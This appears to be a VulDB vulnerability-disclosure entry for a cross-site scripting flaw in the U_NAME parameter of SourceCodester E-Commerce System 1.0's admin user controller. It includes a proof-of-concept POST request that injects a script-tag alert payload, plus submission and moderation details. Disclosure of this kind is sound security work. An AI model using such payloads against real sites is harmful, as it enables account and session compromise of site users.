| Title | E-Commerce System U_NAME CROSS SITE SCRIPTING |
|---|
| Description | A XSS vulnerability has been found in SourceCodester E-Commerce System 1.0, remote attackers can exploit it by sending crafted request.The vulnerable URL is /ecommerce/admin/user/controller.php?action=edit and parameter is U_NAME
Below is the poc:
POST /ecommerce/admin/user/controller.php?action=edit HTTP/1.1
***********************************************************************
USERID=127&deptid=&U_NAME=<script>alert('1')</script>&deptid=&U_USERNAME=craig&deptid=&U_PASS=foo1234&U_ROLE=Administrator&save= |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/20/2023 08:59 (3 years ago) |
|---|
| Moderation | 03/22/2023 11:56 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223561 [SourceCodester E-Commerce System 1.0 controller.php?action=edit U_NAME cross site scripting] |
|---|
| Points | 20 |
|---|